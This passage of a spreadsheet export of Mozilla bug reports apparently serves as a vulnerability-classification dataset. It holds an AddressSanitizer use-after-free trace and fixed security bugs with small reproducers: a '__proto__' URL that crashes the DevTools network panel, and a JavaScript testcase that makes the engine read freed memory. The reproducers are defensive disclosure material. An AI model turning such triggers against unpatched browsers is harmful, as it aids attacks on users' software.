    #14 0x7fdeef7d7d64 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #15 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #16 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #17 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #18 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #19 0x7fdeef7d8852 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #20 0x7fdef0228a53 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2906:12
    #21 0x7fdee6d291ab in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7fdeef7d7d64 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #23 0x7fdeef7d7d64 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #24 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #25 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #26 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #27 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #28 0x7fdeef7d8852 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #29 0x7fdef022a8db in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2965:12
    #30 0x7fdee96bc155 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #31 0x7fdeea0825d5 in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #32 0x7fdeea0825d5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #33 0x7fdeea04c359 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1112:51
    #34 0x7fdeea04e430 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1283:20
    #35 0x7fdeea02dc31 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #36 0x7fdeea0311d2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #37 0x7fdee9fc7618 in mozilla::EventStateManager::DispatchMouseOrPointerEvent(mozilla::WidgetMouseEvent*, mozilla::EventMessage, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4018:3
previously allocated by thread T0 here:
    #0 0x4bc27c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed88d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7fdeeb6e15a1 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7fdeeb6e15a1 in NS_NewXULElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;) /builds/worker/workspace/build/src/dom/xul/nsXULElement.cpp:268
    #4 0x7fdee829be60 in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsTSubstring&lt;char16_t&gt; const*) /builds/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:186:12
    #5 0x7fdee816b1d2 in nsDocument::CreateElementNS(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::ElementCreationOptionsOrString const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:6073:8
    #6 0x7fdee96ff73a in mozilla::dom::DocumentBinding::createElementNS(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1291:59
    #7 0x7fdee9c8b1e0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3041:13
    #8 0x7fdeef7d7d64 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #9 0x7fdeef7d7d64 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #10 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #11 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #12 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #13 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #14 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #15 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #16 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #17 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #18 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #19 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #20 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #21 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #22 0x7fdeef7d8852 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #23 0x7fdef0228a53 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2906:12
    #24 0x7fdee6df24a3 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1318:23
    #25 0x7fdee570567a in PrepareAndDispatch /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:120:28
    #26 0x7fdee5704656 in SharedStub (/home/nils/fuzzer3/rel/firefox/libxul.so+0x20c7656)
    #27 0x7fdeee857ac4 in nsContentTreeOwner::ProvideWindow(mozIDOMWindowProxy*, unsigned int, bool, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/xpfe/appshell/nsContentTreeOwner.cpp:933:27
    #28 0x7fdeef253d8b in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:852:24
    #29 0x7fdeef25965f in OpenWindow2 /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
    #30 0x7fdeef25965f in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
    #31 0x7fdee7e5d025 in nsGlobalWindow::OpenInternal(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:12959:21
    #32 0x7fdee7e5b6ff in OpenJS /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:9013:10
    #33 0x7fdee7e5b6ff in nsGlobalWindow::OpenOuter(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8975
    #34 0x7fdee7e5bb8d in nsGlobalWindow::Open(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8984:3
    #35 0x7fdee941d948 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindow*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2414:56
    #36 0x7fdee941bd65 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15530:13
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/xpcom/base/nsCOMPtr.cpp:42:5 in nsCOMPtr_base::assign_with_AddRef(nsISupports*)
Shadow bytes around the buggy address:
  0x0c1a80047110: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1a80047120: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1a80047130: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80047140: fd fd fd fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1a80047150: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
=&gt;0x0c1a80047160: fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd
  0x0c1a80047170: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c1a80047180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80047190: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
  0x0c1a800471a0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c1a800471b0: fa fa fa fa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1839==ABORTING</t>
        </is>
      </c>
      <c r="X3416" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3417">
      <c r="A3417" t="n">
        <v>1801542</v>
      </c>
      <c r="B3417" t="inlineStr">
        <is>
          <t>2022-11-20 04:17:57 -0800</t>
        </is>
      </c>
      <c r="C3417" t="inlineStr">
        <is>
          <t>Prototype pollution via GET request in network tool inspection</t>
        </is>
      </c>
      <c r="D3417" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:40 -0700</t>
        </is>
      </c>
      <c r="E3417" t="n">
        <v>1</v>
      </c>
      <c r="F3417" t="n">
        <v>1</v>
      </c>
      <c r="G3417" t="n">
        <v>3</v>
      </c>
      <c r="H3417" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3417" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J3417" t="inlineStr">
        <is>
          <t>Netmonitor</t>
        </is>
      </c>
      <c r="K3417" t="inlineStr">
        <is>
          <t>Firefox 109</t>
        </is>
      </c>
      <c r="L3417" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3417" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3417" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3417" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3417" t="inlineStr">
        <is>
          <t>[adv-main110+]</t>
        </is>
      </c>
      <c r="Q3417" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3417" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3417" t="inlineStr">
        <is>
          <t>110 Branch</t>
        </is>
      </c>
      <c r="T3417" t="n">
        <v>1</v>
      </c>
      <c r="U3417" t="n">
        <v>0</v>
      </c>
      <c r="V3417" t="n">
        <v>19</v>
      </c>
      <c r="W3417" t="inlineStr">
        <is>
          <t>Created attachment 9304306
img.png
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Steps to reproduce:
Open developer tools, Network tab. 
Open any website with query parameter `__proto__=`
Click on the request with our GET parameter, crash. 
https://duckduckgo.com/?__proto__=x
I've confrimed this issue on v.105 and v.109-nightly
Actual results:
&gt; The Network panel has crashed.
&gt; TypeError: map[obj.name].push is not a function
Stacktrace (shortened):
parseUrl/urlObject[method].query&lt;@resource://devtools/client/netmonitor/src/components/previews/UrlPreview.js:215:25
parseUrl@resource://devtools/client/netmonitor/src/components/previews/UrlPreview.js:208:40
render@resource://devtools/client/netmonitor/src/components/previews/UrlPreview.js:245:47
Expected results:
Request inspection as per usual</t>
        </is>
      </c>
      <c r="X3417" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3418">
      <c r="A3418" t="n">
        <v>349527</v>
      </c>
      <c r="B3418" t="inlineStr">
        <is>
          <t>2006-08-21 07:54:48 -0700</t>
        </is>
      </c>
      <c r="C3418" t="inlineStr">
        <is>
          <t>GC hazard when copying JSErrorReport</t>
        </is>
      </c>
      <c r="D3418" t="inlineStr">
        <is>
          <t>2006-11-08 15:01:36 -0800</t>
        </is>
      </c>
      <c r="E3418" t="n">
        <v>1</v>
      </c>
      <c r="F3418" t="n">
        <v>1</v>
      </c>
      <c r="G3418" t="n">
        <v>3</v>
      </c>
      <c r="H3418" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3418" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3418" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3418" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3418" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3418" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3418" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3418" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3418" t="inlineStr">
        <is>
          <t>[sg:critical?][need testcase]</t>
        </is>
      </c>
      <c r="Q3418" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3418" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3418" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3418" t="n">
        <v>1</v>
      </c>
      <c r="U3418" t="n">
        <v>0</v>
      </c>
      <c r="V3418" t="n">
        <v>33</v>
      </c>
      <c r="W3418" t="inlineStr">
        <is>
          <t>exn_newPrivate from js/src/jsexn.c contains the following code:
    /*
     * We don't need to copy linebuf and tokenptr, because they
     * point into the deflated string cache.  (currently?)
     */
    newReport-&gt;linebuf = report-&gt;linebuf;  
    newReport-&gt;tokenptr = report-&gt;tokenptr;
This is wrong since, for example, any finally block can trigger GC before the error is reported. GC then releases the cache leading later to accessing of freed memory in the error handler.
For example, consider the following example for JS shell:
var invalid_script = Array(1&lt;&lt;12).join('\n')+"bad!bad!bad";
try {
        Function(invalid_script);
} finally {  
        try {
                Function(invalid_script);
        } catch (e) {
        }
        gc();
}
When the line gc(); is commented out, the shell prints:
~/m/trunk/mozilla/js/src&gt; ./Linux_All_DBG.OBJ/js ~/s/x.js
/home/igor/s/x.js:4099: SyntaxError: missing ; before statement:
/home/igor/s/x.js:4099: bad!bad!bad
/home/igor/s/x.js:4099: ...^
With gc() call present the result is:
~/m/trunk/mozilla/js/src&gt; ./Linux_All_DBG.OBJ/js ~/s/x.js
before 9232, after 9232, break 0819c000
/home/igor/s/x.js:4099: SyntaxError: missing ; before statement:
/home/igor/s/x.js:4099:
/home/igor/s/x.js:4099: ...^
I.e. the shell is accessing freed memory when it prints the error report.</t>
        </is>
      </c>
      <c r="X3418" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3419">
      <c r="A3419" t="n">
        <v>1095025</v>
      </c>
      <c r="B3419" t="inlineStr">
        <is>
          <t>2014-11-06 11:11:39 -0800</t>
        </is>
      </c>
      <c r="C3419" t="inlineStr">
        <is>
          <t>Push Socorro Release 20141107</t>
        </is>
      </c>
      <c r="D3419" t="inlineStr">
        <is>
          <t>2014-11-07 09:07:04 -0800</t>
        </is>
      </c>
      <c r="E3419" t="n">
        <v>1</v>
      </c>
      <c r="F3419" t="n">
        <v>1</v>
      </c>
      <c r="G3419" t="n">
        <v>4</v>
      </c>
      <c r="H3419" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3419" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3419" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K3419" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3419" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3419" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3419" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3419" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3419" t="inlineStr"/>
      <c r="Q3419" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3419" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3419" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3419" t="n">
        <v>1</v>
      </c>
      <c r="U3419" t="n">
        <v>0</v>
      </c>
      <c r="V3419" t="n">
        <v>3</v>
      </c>
      <c r="W3419" t="inlineStr">
        <is>
          <t>https://ci.mozilla.org/job/socorro-release/1472/artifact/socorro.tar.gz
https://github.com/mozilla/socorro/compare/40abbb6cd50c86a82aa9c3122003a539c6494989...1bc572ac2731985615b094fe1dca2d0d9cf0738f</t>
        </is>
      </c>
      <c r="X3419" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3420">
      <c r="A3420" t="n">
        <v>601807</v>
      </c>
      <c r="B3420" t="inlineStr">
        <is>
          <t>2010-10-04 17:08:00 -0700</t>
        </is>
      </c>
      <c r="C3420" t="inlineStr">
        <is>
          <t>Reset the schedulerdb password</t>
        </is>
      </c>
      <c r="D3420" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3420" t="n">
        <v>1</v>
      </c>
      <c r="F3420" t="n">
        <v>1</v>
      </c>
      <c r="G3420" t="n">
        <v>5</v>
      </c>
      <c r="H3420" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3420" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3420" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3420" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3420" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3420" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3420" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3420" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3420" t="inlineStr"/>
      <c r="Q3420" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3420" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3420" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3420" t="n">
        <v>1</v>
      </c>
      <c r="U3420" t="n">
        <v>0</v>
      </c>
      <c r="V3420" t="n">
        <v>4</v>
      </c>
      <c r="W3420" t="inlineStr">
        <is>
          <t>We'll need to coordinate with IT to get this done in the next downtime.</t>
        </is>
      </c>
      <c r="X3420" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3421">
      <c r="A3421" t="n">
        <v>960145</v>
      </c>
      <c r="B3421" t="inlineStr">
        <is>
          <t>2014-01-15 09:38:52 -0800</t>
        </is>
      </c>
      <c r="C3421" t="inlineStr">
        <is>
          <t>range analysis for phi nodes ignores OSR values</t>
        </is>
      </c>
      <c r="D3421" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:43 -0800</t>
        </is>
      </c>
      <c r="E3421" t="n">
        <v>1</v>
      </c>
      <c r="F3421" t="n">
        <v>1</v>
      </c>
      <c r="G3421" t="n">
        <v>3</v>
      </c>
      <c r="H3421" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3421" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3421" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3421" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3421" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3421" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3421" t="inlineStr">
        <is>
          <t>[qa-][adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q3421" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3421" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3421" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T3421" t="n">
        <v>1</v>
      </c>
      <c r="U3421" t="n">
        <v>0</v>
      </c>
      <c r="V3421" t="n">
        <v>26</v>
      </c>
      <c r="W3421" t="inlineStr">
        <is>
          <t>Range analysis for phi nodes ignores OSR value operands (see MPhi::computeRange). In the testcase in bug 960071, the loop phi has a zero constant and an OSR value. Range analysis ignores the OSR value and returns [0,0]. At runtime, the OSR edge is executed, the OSR value is 1, the phi node has value 1, and the range check fails.
Ignoring OSR values seems wrong in view of this testcase. It's been this way since af9e58e86102 (bug 765119).
This issue was hidden in part by a bug in --ion-check-range-analysis which caused it to neglect to check ranges on phi nodes. I've filed bug 960143 for this.</t>
        </is>
      </c>
      <c r="X3421" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3422">
      <c r="A3422" t="n">
        <v>444452</v>
      </c>
      <c r="B3422" t="inlineStr">
        <is>
          <t>2008-07-09 14:59:01 -0700</t>
        </is>
      </c>
      <c r="C3422" t="inlineStr">
        <is>
          <t>Crash with adding weird character into input</t>
        </is>
      </c>
      <c r="D3422" t="inlineStr">
        <is>
          <t>2008-12-30 11:17:53 -0800</t>
        </is>
      </c>
      <c r="E3422" t="n">
        <v>1</v>
      </c>
      <c r="F3422" t="n">
        <v>1</v>
      </c>
      <c r="G3422" t="n">
        <v>3</v>
      </c>
      <c r="H3422" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3422" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3422" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3422" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3422" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3422" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3422" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3422" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3422" t="inlineStr">
        <is>
          <t>[sg:critical?][fixed by bug 445711]</t>
        </is>
      </c>
      <c r="Q3422" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3422" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3422" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3422" t="n">
        <v>1</v>
      </c>
      <c r="U3422" t="n">
        <v>0</v>
      </c>
      <c r="V3422" t="n">
        <v>12</v>
      </c>
      <c r="W3422" t="inlineStr">
        <is>
          <t>Created attachment 328755
testcase
See testcase, which usually crashes within 10s after load.
I got this with the indic IME extension, when pressing the letter 'g' constantly, while Hindi language was selected and Inscript keyboard.
This regressed between 2007-08-28 and 2007-08-29:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-08-28+04&amp;maxdate=2007-08-29+08&amp;cvsroot=%2Fcvsroot
I think a regression from bug 378457.</t>
        </is>
      </c>
      <c r="X3422" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3423">
      <c r="A3423" t="n">
        <v>712169</v>
      </c>
      <c r="B3423" t="inlineStr">
        <is>
          <t>2011-12-19 16:31:14 -0800</t>
        </is>
      </c>
      <c r="C3423" t="inlineStr">
        <is>
          <t>Assertion failure: canAllocUnaligned(n), at js/src/ds/LifoAlloc.cpp:100 or Crash [@ __memcpy_ssse3_rep]</t>
        </is>
      </c>
      <c r="D3423" t="inlineStr">
        <is>
          <t>2013-03-11 09:18:04 -0700</t>
        </is>
      </c>
      <c r="E3423" t="n">
        <v>1</v>
      </c>
      <c r="F3423" t="n">
        <v>1</v>
      </c>
      <c r="G3423" t="n">
        <v>3</v>
      </c>
      <c r="H3423" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
